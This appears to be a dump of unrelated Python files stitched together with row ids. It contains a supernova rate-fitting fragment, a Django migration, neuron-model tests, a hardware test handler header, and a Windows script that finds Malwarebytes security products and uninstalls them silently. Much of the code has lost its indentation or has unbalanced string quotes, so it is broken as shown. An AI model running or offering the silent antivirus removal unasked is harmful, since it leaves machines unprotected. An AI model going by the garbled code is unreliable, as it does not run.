output.write('#MRSLow Threshold for Neg Mures Outliers\n')
output.write('#MRSHigh Threshold for Pos Mures Outliers\n')
output.write('#FitprobCut Lowest Fitprob in sim\n')
output.write('#MRSCut NSigma Hubble residual cut\n')
output.write('#Chi2 minimum value of Chi2 function\n')
output.write('#Correlation cov[0,1]/np.sqrt(cov[0,0]*cov[1,1])\n')
output.write('#Date \t\tDataBeta N_sims SampleSize delta_Beta sigma_Beta BetaStdErr BetaStatErr K sigma_K KStdErr KStatErr meanZ sigmaZ sigmaDz NCC/NTotScaled NCC/NTot CCScales TypeChoice NNProbCut NBins MRSLow MRSHigh FitprobCut MRSCut Chi2 Correlation\n')
else:
output = open(outfile1, 'a')
print 'outfile'
print outfile
cat = RateTest.simcat.Catalog
t = time.strftime('%b-%d-%H:%M')
N_Sims = np.sum(np.invert(np.isnan(ks)))
SigBeta = float(BetaSigma[0])
SigK = float(ksigma[0])
kStdErr = float(ksigma[0])/np.sqrt(N_Sims)
BetaStdErr = float(BetaSigma[0])/np.sqrt(N_Sims)
meanZ = np.nanmean(cat[RateTest.ztype])
sigZ = np.nanstd(cat[RateTest.ztype])
sigDZ = np.nanstd(cat[RateTest.ztype] - cat['SIM_ZCMB'])
lowzCut = zminFit
highzCut = zmaxFit
contam2 = np.sum(cat[(cat[RateTest.ztype] > lowzCut) & (cat[RateTest.ztype] < highzCut)]['SIM_TYPE_INDEX'] !=1).astype(float)/ float(cat[(cat[RateTest.ztype] > lowzCut) & (cat[RateTest.ztype] < highzCut)].shape[0])
contam = RateTest.fracCCDataTot
ccscales = np.average(np.array(CCScaleStorage),weights = 1.0/ma.masked_invalid(CCScaleErrStorage)**2, axis = 0)
cov = RateTest.covar
correlation = cov[0, 1] / np.sqrt(cov[0, 0] * cov[1, 1])
print "Outfile debug"
print t
print trueBeta
print N_Sims
print BetaMean[0]
print BetaStdErr
print BetaErrs[0]
print meanZ
print sigZ
print sigDZ
print contam
print RateTest.typeString
print RateTest.postCutSimCat['NN_PROB_IA'].min()
print SigBeta
print kmean[0]
print kErrs[0]
print kStdErr
print SigK
print np.nanmean(SampleSizes)
print int(nbinsFit)
print ScaleMuResCutLow
print ScaleMuResCutHigh
print RateTest.postCutSimCat['FITPROB'].min()
print MURESCuts
print np.mean(Chi2Mean)
print contam2
print ccscales
print correlation
ccscales = ','.join(str(ccscales).split())
output.write('{0}\t\t{1:.2f}\t{2}\t{17:.3f}\t{3:.3f}\t{12:.3f}\t{4:.3f}\t{5:.3f}\t{13:.3f}\t{14:.3f}\t{15:.3f}\t{16:.3f}\t{6:.3f}\t{7:.3f}\t{8:.3f}\t{9:.3f}\t{24:.3f}\t{25}\t{10}\t{11:.3f}\t{18:d}\t{19:.3f}\t{20:.3f}\t{21:.3f}\t{22:.2f}\t{23:.3f}\t{26:.3f}\n'.format(t, trueBeta, N_Sims, BetaMean[0], BetaStdErr, BetaErrs[0],meanZ, sigZ, sigDZ, contam, RateTest.typeString, RateTest.postCutSimCat['NN_PROB_IA'].min(), SigBeta, kmean[0], kErrs[0], kStdErr, SigK, np.nanmean(SampleSizes), int(nbinsFit), ScaleMuResCutLow, ScaleMuResCutHigh, RateTest.postCutSimCat['FITPROB'].min(), MURESCuts, np.mean(Chi2Mean), contam2, ccscales, correlation) )
print "BetaMean[0]"
print BetaMean[0]
print BetaMean
print "KMean[0]"
print kmean[0]
print kmean
print "Correlation"
print correlation
#print "BetaWeightMean[0]"
#print BetaWeightMean[0]
#print BetaWeightMean
#print "KWeightMean[0]"
#print KWeightMean[0]
#print KWeightMean
if not noCCMC:
print "Individual Scales"
print CCScaleStorage
print "Individual ScaleErrs"
print CCScaleErrStorage
print "average ScaleErrs"
print np.nanmean(CCScaleErrStorage)
print "AAA CC Scale means (weighted, unweighted)2"
print np.average(ma.masked_invalid(np.array(CCScaleStorage)), weights = 1.0/ma.masked_invalid(CCScaleErrStorage)**2)
print np.nanmean(ma.masked_invalid(np.array(CCScaleStorage)))
print "AAA CC Scale stds"
print np.nanstd(np.array(CCScaleStorage))
if simInd == 1:
plt.clf()
hist, bins = np.histogram(CCScaleStorage, bins = np.linspace(0.0, 5.0, 10))
plt.step((bins[1:]+bins[:-1])/2.0, hist, where = 'mid', c = 'g')
plt.savefig(dataname + 'ScaleDistro.png')
plt.clf()
print "nIter"
print nIter
if not (priorRate is None):
kPriorPlots = np.linspace(0.8, 1.5, 300)
kPriors = []
for ktemp in kPriorPlots:
kPriors.append(ratePrior(ktemp*trueMCK, BetaMean[0]*trueMCBeta, priorRate, priorZEff, priorRateErrUp = ratePriorErrUp, priorRateErrDown = ratePriorErrDown, priorRateErrAll = ratePriorErrAll))
betaPriorPlots = np.linspace(-0.5, 0.5, 300)
betaPriors = []
for btemp in betaPriorPlots:
betaPriors.append(ratePrior(kmean[0]*trueMCK, b*trueMCBeta, priorRate, priorZEff, priorRateErrUp = ratePriorErrUp, priorRateErrDown = ratePriorErrDown, priorRateErrAll = ratePriorErrAll))
actualPrior = ratePrior(kmean[0]*trueMCK, BetaMean[0]*trueMCBeta, priorRate, priorZEff, priorRateErrUp = ratePriorErrUp, priorRateErrDown = ratePriorErrDown, priorRateErrAll = ratePriorErrAll)
kPriors = np.array(kPriors)
betaPriors = np.array(betaPriors)
plt.clf()
plt.figure()
plt.plot(kPriorPlots, np.log10(kPriors) )
plt.hlines(np.log10(actualPrior), kPriorPlots[0], kPriorPlots[-1], label = 'Best Fit Prior = {0:.03f}'.format(actualPrior))
plt.vlines(kmean[0], np.log10(kPriors).min(), np.log10(kPriors).max(), label = 'Best Fit K = {0:.03f}'.format(kmean[0]))
plt.xlabel('k')
plt.ylabel('ratePrior')
plt.legend()
plt.savefig(dataname + '_LogKPriorPlot.png')
plt.clf()
plt.figure()
plt.plot(kPriorPlots, kPriors)
plt.hlines(actualPrior, kPriorPlots[0], kPriorPlots[-1], label = 'Best Fit Prior = {0:.03f}'.format(actualPrior))
plt.vlines(kmean[0], kPriors.min(), kPriors.max(), label = 'Best Fit K = {0:.03f}'.format(kmean[0]))
plt.xlabel('k')
plt.ylabel('ratePrior')
plt.legend()
plt.savefig(dataname + '_KPriorPlot.png')
plt.clf()
plt.figure()
plt.plot(betaPriorPlots, betaPriors)
plt.hlines(actualPrior, betaPriorPlots[0], betaPriorPlots[-1], label = 'Best Fit Prior = {0:.03f}'.format(actualPrior))
plt.vlines(BetaMean[0], betaPriors.min(), betaPriors.max(), label = 'Best Fit Beta = {0:.03f}'.format(BetaMean[0]))
plt.xlabel('beta')
plt.ylabel('ratePrior')
plt.legend()
plt.savefig(dataname + '_BetaPriorPlot.png')
'''
argList = ''
minObjList = ''
chi2Initargs = ''
for i in xrange(zCenters.shape[0]):
argList += 'f{0},'.format(i)
minObjList += 'f{0} = 1.0, error_f{0} = 0.1, limit_f{0} = (0.0, None),'.format(i)
chi2Initargs += '1.0,'
argList = argList[:-1]
minObjList = minObjList[:-1]
chi2Initargs = chi2Initargs[:-1]
#print argList
#print minObjList
#print chi2Initargs
exec('''
'''
def chi2func(nData, nSim, effmat, fnorm, zCenters, {0}, dump = False, complexdump = False):
Chi2Temp = 0.0
f_Js = [{0}]
chi2Mat = np.zeros((self.nbins))
adjNMC = np.zeros((self.nbins))
#print f_Js
#Check if I am scaling errors down with increasing MC size. Make MC twice as large as "Data" to test.
for row, nDataI, i in zip(effmat, nData, xrange(self.nbins)):
#if dump:
# print "nDataI"
# print nDataI
JSumTemp = 0.0
for eff, nSimJ, f_J, j in zip(row, nSim, f_Js, xrange(self.nbins)):
JSumTemp += nSimJ*f_J*eff*fnorm
if dump and i == j:
print "nDataI"
print nDataI
print "Bin Contribution to scaled nSim"
print nSimJ*f_J*eff*fnorm
#print "Product of nSimJ, f_J, eff, fnorm"
#print nSimJ
#print f_J
#print eff
#print fnorm
if nDataI > 1E-11 or JSumTemp > 1E-11:
if dump and i == j:
print "nDataI"
print nDataI
print "scaled nSim"
print JSumTemp
print "fnorm"
print fnorm
print "error"
print nDataI + JSumTemp*fnorm
if (nDataI + JSumTemp*fnorm) <= 0:
print (nDataI + JSumTemp*fnorm)
assert(0)
Chi2Temp += ((nDataI - JSumTemp)**2/(nDataI + JSumTemp*fnorm))#*fnorm**2
return Chi2Temp
''''''.format(argList), locals())
fnorm = float(np.sum(nData))/float(self.simcat.Catalog['zPHOT'].shape[0])
#print type(chi2func)
#print 'lamChi2 = lambda {0}: chi2func(nData, nSim, self.effmat, fnorm, zCenters, {0})'.format(argList)
exec('lamChi2 = lambda {0}: chi2func(nData, nSim, self.effmat, fnorm, zCenters, {0})'.format(argList),locals())
exec('lamChi2Dump = lambda {0}: chi2func(nData, nSim, self.effmat, fnorm, zCenters, {0}, dump = True)'.format(argList),locals())
#print type(lamChi2)
#print type(lamChi2Dump)
#print 'MinObj = M(lamChi2, {0})'.format(minObjList)
exec('MinObj = M(lamChi2, {0})'.format(minObjList),locals())
exec('chi2Init = lamChi2Dump({0})'.format(chi2Initargs),locals())
#print "Chi2 init = {0}".format(round(chi2Init, 4))
MinObj.set_strategy(2)
MinObj.migrad()
#MinObj.minos()
zCenters = (simBins[1:] + simBins[:-1])/2.0
print MinObj.values
fJs = []
fJErrs = []
for v in MinObj.values.keys():
fJs.append(MinObj.values[v])
fJErrs.append(MinObj.errors[v])
exec('lamChi22 = lambda k, Beta: self.chi2V2(fJs, fJErrs, zCenters, k, Beta)',locals())
exec('MinObj2 = M(lamChi22, k = 1.0, error_k = 0.1, limit_k = (0.0, None), Beta = 0.0, error_Beta = 0.1)',locals())
#print "Large Perfect Sim {0}".format(simInd)
#print "Sim R0 = 1.7E-5; Sim Beta = 4.2"
##print "Sim Beta = 1.5; Data Beta = 1.5"
##RateTest = Rate_Fitter('DES_FULLSURVEY_TEST/JLDESFULLSURVEYIaOnly+zPHOT+smearC11/FITOPT000+SALT2mu.FITRES', 'JLDESFULLSURVEYIaOnly+zPHOT+smearC11','JLDES_R0_7E-5_Beta_1-5_Shallow/JLDES_R0_7E-5_Beta_1-5_Shallow/FITOPT000+SALT2mu.FITRES', 'JLDES_R0_7E-5_Beta_1-5_Shallow','/project/rkessler/SN/SNDATA_ROOT/SIM/JLDES_R0_7E-5_Beta_1-5_Shallow/JLDES_R0_7E-5_Beta_1-5_Shallow.DUMP')
#print '/project/rkessler/jlasker/Rate_Analysis/TestSameK2Beta/outFit_datasize/JLDES_R0_1-7E-5_Beta_4-2_Datasize_Perfect-00{0:02d}/FITOPT000.FITRES'.format(simInd)
#RateTest = Rate_Fitter('/project/rkessler/jlasker/Rate_Analysis/TestSameK2Beta/outFit_datasize/JLDES_R0_1-7E-5_Beta_4-2_Datasize_Perfect-00{0:02d}/FITOPT000.FITRES'.format(simInd), 'TestSameK2Beta/JLDES_R0_1-7E-5_Beta_4-2-00{0:02d}'.format(simInd),'/project/rkessler/jlasker/Rate_Analysis/outFit_datalike/JLDES_R0_1-7E-5_Beta_2-1_Datalike_PERFECT/FITOPT000.FITRES', 'JLDES_R0_1-7E-5_Beta_2-1_DataLikePhotZ','/scratch/midway2/rkessler/SNDATA_ROOT/SIM/JLDES_R0_1-7E-5_Beta_2-1_Datalike_PERFECT/JLDES_R0_1-7E-5_Beta_2-1_Datalike_PERFECT.DUMP', 2.1, zmin = 0.1, zmax = 1.3)# , MJDMin = 0, MJDMax = np.inf)
#RateTest.effCalc(nbins = 12)
##RateTest.effCalc(nbins = 20)
#RateTest.fit_rate()
#ksPerf.append(RateTest.k)
#kErrsPerf.append(RateTest.kErr)
#BetasPerf.append(RateTest.Beta)
#BetaErrsPerf.append(RateTest.BetaErr)
#print "Sim Beta = 1.5; Data Beta = 1.5"
#RateTest = Rate_Fitter('DES_FULLSURVEY_TEST/JLDESFULLSURVEYIaOnly+zPHOT+smearC11/FITOPT000+SALT2mu.FITRES', 'JLDESFULLSURVEYIaOnly+zPHOT+smearC11','JLDES_R0_7E-5_Beta_1-5_Shallow/JLDES_R0_7E-5_Beta_1-5_Shallow/FITOPT000+SALT2mu.FITRES', 'JLDES_R0_7E-5_Beta_1-5_Shallow','/project/rkessler/SN/SNDATA_ROOT/SIM/JLDES_R0_7E-5_Beta_1-5_Shallow/JLDES_R0_7E-5_Beta_1-5_Shallow.DUMP')
try:
optfname = argv[1]
opts = open(optfname, 'r')
optlist = opts.readlines()
zmin = None; zmax = None; MJDMin = None; MJDMax = None; bins = None; runFit = None
for opt in optlist:
try:
optName, optVal = opt.split()
except:
print "{0} not formatted correctly".format(opt)
continue
if (optName.lower() == 'zmin') & (not zmin): zmin = optVal
if (optName.lower() == 'zmax') & (not zmax): zmax = optVal
if (optName.lower() == 'mjdmin') & (not MJDMin): MJDMin = optVal
if (optName.lower() == 'mjdmax') & (not MJDMax): MJDMax = optVal
if (optName.lower() == 'bins') & (not bins): zmin = optVal
if (optName.lower() == 'runfit') & (not runFit == None): zmin = optVal
if zmin == None: zmin = 0.1
if zmax == None: zmax = 1.2
if MJDMin == None: MJDMin = 0.0
if MJDMax == None: MJDMax = np.inf
if bins == None: bins = "equalSize"
if runFit == None: runFit = True
except:
print "Option File not working/Nonexistent. Using default values"
''' |
7,132 | b6a0a49e05fbc0ac7673d6c9e8ca4d263c8bb5cd | # Generated by Django 2.2.17 on 2020-12-05 07:43
from django.db import migrations, models
class Migration(migrations.Migration):
    """Make both identification image fields optional (blank/null allowed)."""

    dependencies = [
        ('service', '0001_initial'),
    ]

    # The two AlterField operations differ only in field name and upload
    # directory, so generate them from a (field_name, upload_dir) table.
    operations = [
        migrations.AlterField(
            model_name='identification',
            name=field_name,
            field=models.ImageField(blank=True, null=True, upload_to=upload_dir),
        )
        for field_name, upload_dir in (
            ('id_card_img', 'images/img_card/'),
            ('selfie_img', 'images/img_selfie/'),
        )
    ]
|
7,133 | a444e215b64b3a2d7f736e38227b68c1a1b952a0 | import os
import platform
import _winreg
def gid(x):
    """Find an installed program whose DisplayName contains *x*
    (case-insensitive) and run its registry UninstallString silently.

    Scans the four standard uninstall hives (HKLM/HKCU x native/WOW6432Node).
    If several programs match, the last match found wins, mirroring the
    original scan order.
    """
    find = x
    winreg = _winreg
    REG_PATH1 = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
    REG_PATH2 = r"SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall"
    name = []
    string = []
    def _collect(root, base_path):
        # Enumerate every sub-key of base_path and record its DisplayName /
        # UninstallString pair; entries missing either value are skipped.
        try:
            parent = winreg.OpenKey(root, base_path, 0, winreg.KEY_READ)
        except:
            # Hive not present (e.g. WOW6432Node on 32-bit Windows).
            return
        i = 0
        while True:
            try:
                sub = winreg.EnumKey(parent, i)
                child = winreg.OpenKey(root, base_path + '\\' + sub, 0, winreg.KEY_READ)
                try:
                    display, _ = winreg.QueryValueEx(child, 'DisplayName')
                    uninstall, _ = winreg.QueryValueEx(child, 'UninstallString')
                    winreg.CloseKey(child)
                    name.append(display)
                    string.append(uninstall)
                except:
                    pass
                i += 1
            except:
                break
    # BUG FIX: the original HKLM/WOW6432Node pass additionally demanded a
    # DisplayVersion value (never used) and silently skipped entries without
    # one; all four hives are now scanned uniformly.
    _collect(winreg.HKEY_LOCAL_MACHINE, REG_PATH1)
    _collect(winreg.HKEY_LOCAL_MACHINE, REG_PATH2)
    _collect(winreg.HKEY_CURRENT_USER, REG_PATH1)
    _collect(winreg.HKEY_CURRENT_USER, REG_PATH2)
    # BUG FIX: the original raised NameError when nothing matched; bail out
    # quietly instead.
    match = None
    for candidate in name:
        if find.lower() in candidate.lower():
            match = candidate
    if match is None:
        return
    lookup = dict(zip(name, string))
    uninstall_cmd = lookup[match]
    if uninstall_cmd:
        cmd = uninstall_cmd + ' /quiet REBOOT=ReallySuppress REMOVE=ALL'
        os.popen(cmd).read()
def uni():
arch=platform.machine()
if 'AMD64' in arch:
if os.path.exists(os.environ['PROGRAMFILES(X86)']):
if os.path.exists(os.path.join(os.environ['PROGRAMFILES(X86)'],"Malwarebytes' Anti-Malware")):
os.chdir(os.path.join(os.environ['PROGRAMFILES(X86)'],"Malwarebytes' Anti-Malware"))
print "\n\t*)Malwarebytes Anti-Malware Uninstallation started......"
out=os.popen("unins000.exe /VERYSILENT /SUPPRESSMSGBOXES /NORESTART").read()
print(out)
if os.path.exists(os.path.join(os.environ['PROGRAMFILES(X86)'],"Malwarebytes Anti-Malware")):
os.chdir(os.path.join(os.environ['PROGRAMFILES(X86)'],"Malwarebytes Anti-Malware"))
print "\n\t*)Malwarebytes Anti-Malware Uninstallation started......"
out=os.popen("unins000.exe /VERYSILENT /SUPPRESSMSGBOXES /NORESTART").read()
print(out)
else:
if os.path.exists(os.environ['PROGRAMFILES']):
if os.path.exists(os.path.join(os.environ['PROGRAMFILES'],"Malwarebytes' Anti-Malware")):
print "\n\t*)Malwarebytes Anti-Malware Uninstallation started......"
os.chdir(os.path.join(os.environ['PROGRAMFILES'],"Malwarebytes' Anti-Malware"))
out=os.popen("unins000.exe /VERYSILENT /SUPPRESSMSGBOXES /NORESTART").read()
print(out)
if os.path.exists(os.path.join(os.environ['PROGRAMFILES'],"Malwarebytes Anti-Malware")):
os.chdir(os.path.join(os.environ['PROGRAMFILES'],"Malwarebytes Anti-Malware"))
print "\n\t*)Malwarebytes Anti-Malware Uninstallation started......"
out=os.popen("unins000.exe /VERYSILENT /SUPPRESSMSGBOXES /NORESTART").read()
print(out)
def uni2():
arch=platform.machine()
if 'AMD64' in arch:
if os.path.exists(os.environ['PROGRAMFILES(X86)']):
if os.path.exists(os.path.join(os.environ['PROGRAMFILES(X86)'],"Malwarebytes Anti-Exploit")):
print "\n\t*)Malwarebytes Anti-Exploit Uninstallation started......"
os.chdir(os.path.join(os.environ['PROGRAMFILES(X86)'],"Malwarebytes Anti-Exploit"))
out=os.popen("unins000.exe /VERYSILENT /SUPPRESSMSGBOXES /NORESTART").read()
print(out)
else:
if os.path.exists(os.environ['PROGRAMFILES']):
if os.path.exists(os.path.join(os.environ['PROGRAMFILES'],"Malwarebytes Anti-Exploit")):
os.chdir(os.path.join(os.environ['PROGRAMFILES'],"Malwarebytes Anti-Exploit"))
print "\n\t*)Malwarebytes Anti-Exploit Uninstallation started......"
out=os.popen("unins000.exe /VERYSILENT /SUPPRESSMSGBOXES /NORESTART").read()
print(out)
def uni3():
if os.path.exists(os.environ['PROGRAMFILES']):
if os.path.exists('C:\Program Files\Malwarebytes\Anti-Malware'):
os.chdir('C:\Program Files\Malwarebytes\Anti-Malware')
print "\n\t*)Malwarebytes Uninstallation started......"
out=os.popen("unins000.exe /VERYSILENT /SUPPRESSMSGBOXES /NORESTART").read()
print(out)
else:
print "\n\t*)Malwarebytes path not found..."
def uni4():
    """Uninstall "Malwarebytes' Managed Client" via its MSI product GUID.

    Tries `wmic product` first; if the GUID cannot be parsed from there,
    falls back to scanning the registry uninstall hives.
    """
    import os
    import _winreg
    import re
    def check():
        # Ask WMI for every installed MSI product (GUID + name per line).
        inst=os.popen("wmic product get name,identifyingnumber").read()
        return inst
    def reg():
        # Fallback: locate the product's uninstall registry key by its exact
        # display name and return a quoted HKLM path ending in the GUID.
        blacklist=r"Malwarebytes' Managed Client"
        def collectprograms(rtkey,pK,kA):
            # Gather [DisplayName, subkey-path, hive-path] triples under one
            # uninstall hive.  NOTE(review): `list` shadows the builtin.
            try:
                list=[]
                oK=_winreg.OpenKey(rtkey,pK,0,kA)
                i=0
                while True:
                    try:
                        bkey=_winreg.EnumKey(oK,i)
                        vkey=os.path.join(pK,bkey)
                        oK1=_winreg.OpenKey(rtkey,vkey,0,kA)
                        try:
                            DN,bla=_winreg.QueryValueEx(oK1,'DisplayName')
                            inlist=[DN.strip(), vkey, pK]
                            list.append(inlist)
                        except:
                            pass
                        i+=1
                    except:
                        break
            except:
                pass
            return list
        uninstallkey_32='SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall'
        # Scan both 32- and 64-bit registry views on 64-bit systems.
        if 'PROGRAMFILES(X86)' in os.environ.keys():
            rklist=[(_winreg.HKEY_LOCAL_MACHINE,uninstallkey_32,_winreg.KEY_WOW64_32KEY | _winreg.KEY_READ),
                (_winreg.HKEY_LOCAL_MACHINE,uninstallkey_32,_winreg.KEY_WOW64_64KEY | _winreg.KEY_READ),
                (_winreg.HKEY_CURRENT_USER,uninstallkey_32,_winreg.KEY_WOW64_32KEY | _winreg.KEY_READ),
                (_winreg.HKEY_CURRENT_USER,uninstallkey_32,_winreg.KEY_WOW64_64KEY | _winreg.KEY_READ)]
        else:
            rklist=[(_winreg.HKEY_LOCAL_MACHINE,uninstallkey_32,_winreg.KEY_READ),
                (_winreg.HKEY_CURRENT_USER,uninstallkey_32,_winreg.KEY_READ)]
        bet=[]
        for i in rklist:
            col=collectprograms(i[0], i[1], i[2])
            for c in col:
                print c
                # `in` on the triple matches only an exact DisplayName hit.
                if blacklist in c:
                    bet.append(c[1])
        if not bet:
            print "Please Mention the valid blacklist Installed Software"
        else:
            for i in bet:
                print i
                # Quote the spaces so the path survives later splitting.
                j=i.replace(" ", '" "')
                v='\\'
                path="HKEY_LOCAL_MACHINE"+v+i
                path1="HKEY_LOCAL_MACHINE"+v+j
                got=path1
            # Returns the quoted path of the *last* match found.
            return got
    inst=check()
    if len(inst)>0:
        # Look for the product GUID directly in the wmic listing.
        find=re.findall("{.*}\s\sMalwarebytes'\sManaged\\sClient",inst)
        if len(find)>0:
            final=re.findall('{.*}',find[0])[0]
            if len(final) == 38:
                # A well-formed GUID (38 chars incl. braces): hand it to msiexec.
                print "\n\t*)Malwarebytes' Managed Client Uninstallation started......"
                cmd='msiexec.exe /x %s /quiet REBOOT=ReallySuppress REMOVE=ALL'%final
                os.popen(cmd).read()
        else:
            # wmic had no entry; pull the GUID out of the registry key name.
            fin=reg()
            fina=fin.split('\\')[-1]
            final1=re.findall('{.*}',fina)[0]
            print "\n\t*)Malwarebytes' Managed Client Uninstallation started......"
            cmd='msiexec.exe /x %s /quiet REBOOT=ReallySuppress REMOVE=ALL'%final1
            os.popen(cmd).read()
def checkapp(AppName):
    """Return True when a program whose DisplayName contains *AppName*
    (case-insensitive) appears in any Windows uninstall registry hive."""
    import _winreg
    import os
    AppName = AppName.lower()
    def DNDS(rtkey, pK, kA):
        # Collect (DisplayName, DisplayVersion) pairs under one uninstall
        # hive; entries missing either value are skipped, as before.
        ln = []
        lv = []
        try:
            oK = _winreg.OpenKey(rtkey, pK, 0, kA)
            i = 0
            while True:
                try:
                    bkey = _winreg.EnumKey(oK, i)
                    vkey = os.path.join(pK, bkey)
                    oK1 = _winreg.OpenKey(rtkey, vkey, 0, kA)
                    try:
                        DN, bla = _winreg.QueryValueEx(oK1, 'DisplayName')
                        DV, bla = _winreg.QueryValueEx(oK1, 'DisplayVersion')
                        _winreg.CloseKey(oK1)
                        ln.append(DN)
                        lv.append(DV)
                    except:
                        pass
                    i += 1
                except:
                    break
            _winreg.CloseKey(oK)
        except:
            pass
        return zip(ln, lv)
    # Decide which registry views to scan from the CPU architecture recorded
    # in the session-manager environment key.
    rK = _winreg.HKEY_LOCAL_MACHINE
    sK = r'SYSTEM\CurrentControlSet\Control\Session Manager\Environment'
    openedKey = _winreg.OpenKey(rK, sK, 0, _winreg.KEY_READ)
    arch, bla = _winreg.QueryValueEx(openedKey, 'PROCESSOR_ARCHITECTURE')
    arch = str(arch)
    _winreg.CloseKey(openedKey)
    uninst = r'SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall'
    if arch == 'AMD64':
        # 64-bit: scan both WOW64 views of HKLM and HKCU.
        hives = [(root, view | _winreg.KEY_READ)
                 for root in (_winreg.HKEY_LOCAL_MACHINE, _winreg.HKEY_CURRENT_USER)
                 for view in (_winreg.KEY_WOW64_32KEY, _winreg.KEY_WOW64_64KEY)]
    else:
        hives = [(_winreg.HKEY_LOCAL_MACHINE, _winreg.KEY_READ),
                 (_winreg.HKEY_CURRENT_USER, _winreg.KEY_READ)]
    fList = []
    for root, access in hives:
        fList.extend(DNDS(root, uninst, access))
    # Cleanup: the original built an unused report list plus a hit counter;
    # a direct search over the de-duplicated entries gives the same result.
    for progname, progversion in set(fList):
        if AppName in progname.lower():
            return True
    return False
def recheck():
app3=checkapp('Malwarebytes Anti-Malware')
app8=checkapp('Malwarebytes Anti-Malware')
if app3:
print '\n\t\t*)Try again with Uninstall String'
gid('Malwarebytes Anti-Malware')
if app8:
print "\n\t\t*)Malwarebytes Anti-Malware Uninstalled Failed...."
return '0'
else:
print "\n\t\t*)Malwarebytes Anti-Malware Uninstalled Successfully...."
return '1'
else:
print "\n\t*)Malwarebytes Anti-Malware Uninstalled Successfully...."
return '1'
def recheck1():
app4=checkapp('Malwarebytes Anti-Exploit')
app9=checkapp('Malwarebytes Anti-Malware')
if app4:
print '\n\t\t*)Try again with Uninstall String'
gid('Malwarebytes Anti-Exploit')
if app9:
print "\n\t\t*)Malwarebytes Anti-Exploit Uninstalled Failed...."
return '0'
else:
print "\n\t\t*)Malwarebytes Anti-Exploit Uninstalled Successfully...."
return '1'
else:
print "\n\t*)Malwarebytes Anti-Exploit Uninstalled Successfully...."
return '1'
def recheck2():
app6=checkapp('Malwarebytes version')
app10=checkapp('Malwarebytes Anti-Malware')
if app6:
print '\n\t\t*)Try again with Uninstall String'
gid('Malwarebytes version')
if app10:
print "\n\t\t*)Malwarebytes Uninstalled Failed...."
return '0'
else:
print "\n\t\t*)Malwarebytes Uninstalled Successfully...."
return '1'
else:
print "\n\t*)Malwarebytes Uninstalled Successfully...."
return '1'
def recheck3():
app7=checkapp("Malwarebytes' Managed Client")
app11=checkapp('Malwarebytes Anti-Malware')
if app7:
print "\n\t*)Malwarebytes' Managed Client Uninstalled Failed...."
else:
print "\n\t*)Malwarebytes' Managed Client Uninstalled Successfully...."
return '1'
# ---- Entry sequence: probe for each Malwarebytes product, run its ----
# ---- uninstaller when found, and record a per-product status flag. ----
# NOTE(review): the "not found" branches store the int 1 while the recheck
# helpers return the string '1'/'0'; any consumer must accept both.
app1=checkapp('Malwarebytes Anti-Malware')
app2=checkapp('Malwarebytes Anti-Exploit')
app5=checkapp('Malwarebytes version')
app7=checkapp("Malwarebytes' Managed Client")
if app1:
    print "Malwarebytes Anti-Malware is Found in the system"
    uni()
    r=recheck()
else:
    print "\nMalwarebytes Anti-Malware is not found in the system"
    r=1
if app2:
    print "\nMalwarebytes Anti-Exploit is Found in the System"
    uni2()
    r1=recheck1()
else:
    print "\nMalwarebytes Anti-Exploit is not found in the system"
    r1=1
if app5:
    print "\nMalwarebytes is Found in the system"
    uni3()
    r2=recheck2()
else:
    print "\nMalwarebytes is not found in the system"
    r2=1
if app7:
    print "\nMalwarebytes' Managed Client is Found in the system"
    uni4()
    r3=recheck3()
else:
    print "\nMalwarebytes' Managed Client is not found in the system"
    r3=1
|
7,134 | 6dbafbcf126c37edb2187eb28c01e2c1125c1c64 | import sys, os; sys.path.insert(0,'..'); sys.path.insert(0,'../NEURON');
from tests.cells.NEURONCellTest import NEURONCellTest
from tests.cells.NeuroMLCellTest import NeuroMLCellTest
class NEURON(NEURONCellTest):
    """Granule-cell current-clamp test driven by the native NEURON model."""

    def __init__(self):
        super(NEURON, self).__init__()
        # Model source, result destination and stimulation range for this cell.
        self.path = "../NEURON/granule.hoc"
        self.label = "granule"
        self.resultsFile = "results/cells/granule/NEURON.json"
        self.currentRange = (-0.01, 0.1)

    def prepare(self, h):
        """Build a one-granule-cell network and return the cell under test."""
        sys.path.append(os.getcwd())
        import customsim
        import modeldata
        customsim.setup(1, 1)
        model = modeldata.getmodel()
        chosen = model.granules[110821]  # the granule attached to the first mitral cell
        h.celsius = 24
        return chosen
class NeuroML(NeuroMLCellTest):
    """Granule-cell current-clamp test driven by the NeuroML2 export."""

    def __init__(self):
        super(NeuroML, self).__init__()
        # Exported cell definition, result destination and stimulation range.
        self.path = "../NeuroML2/GranuleCells/Exported/Granule_0_110821.cell.nml"
        self.label = "granule"
        self.resultsFile = "results/cells/granule/NeuroML.json"
        self.id = "Granule_0_110821"
        self.currentRange = (-0.01, 0.1)

    def prepare(self, h):
        """Instantiate the exported hoc template and return the cell."""
        h.load_file(self.id + ".hoc")
        instance = getattr(h, self.id)()
        h.celsius = 24
        return instance
|
7,135 | 3727c4413cd69305c8ee8d02f4532629da7d25de | def twenty():
pass |
7,136 | 10e1756dc1d6c7b6b7e3569de78e9fa4cdfb0d7e | #-*- coding: UTF-8 -*-
import re
import time
import sys
import command.server.handle_utility as Utility
from ee.common import logger
from ee.common import xavier as Xavier1
sys.path.append('/opt/seeing/app/')
from b31_bp import xavier1 as Xavier2
# Select the backend board driver from the command-line endpoint argument.
# NOTE(review): raises IndexError when the script is run without an argument.
global agv
agv=sys.argv[1]
Xavier=Xavier1
# Map of RPC endpoints to their board modules; unknown endpoints keep Xavier1.
xavier_module = {"tcp:7801":Xavier1, "tcp:7802":Xavier2}
if agv in xavier_module:
    Xavier=xavier_module[agv]
# Name of the board targeted by every Xavier.call() in the handlers below.
test_base_board_name = "zynq"
global batt_value
batt_value={"current":1,"voltage":1,}#current unit mA,mV
global vbus_value
vbus_value={"current":1,"voltage":1,}#current unit mA,mV
# Every DAC channel accepted by the 'dac set' command handler.
dac_list=[ "psu1_ocp" , "psu1_ovp", "psu1_ocp_ad5601" , "psu1_ovp_ad5601", "psu1_current", "psu1_voltage",
"psu2_ocp", "psu2_ovp","psu2_ocp_ad5601", "psu2_ovp_ad5601","psu2_current", "psu3_ocp","psu3_ocp_ad5601","psu3_ovp", "psu2_voltage","psu3_ovp_ad5601", "psu3_current" ,"psu3_voltage", "base_board"]
# Pre-render the channel list used in the handlers' help text.
help_str=''
for i in dac_list:
    help_str=help_str+i+',\r\n\t '
# global calibration_var
